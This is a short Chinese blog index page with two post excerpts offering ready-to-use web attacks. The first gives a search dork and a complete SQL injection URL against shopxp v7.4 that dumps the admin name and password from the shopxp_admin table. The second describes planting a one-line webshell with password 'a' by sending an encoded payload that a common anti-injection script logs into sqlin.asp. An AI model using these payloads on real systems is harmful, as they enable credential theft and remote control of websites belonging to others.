山貓

摘要： 漏洞版本：shopxp网上购物系统 v7.4关键词：inurl:shopxp_news.aspshopxp_news.asp暴密码的语句：/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin 阅读全文

摘要： 转自：http://hi.baidu.com/jsexp/item/36a73a0b4297bc133b53ee7b插入一句话这些网站都用的通用防注入系统有个别网站的目录存在sqlin.asp保存注入记录 可以写入一句话木马比如 http://xx.com/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾 可在http://xx.com/sqlin.asp写入一句话，密码a 阅读全文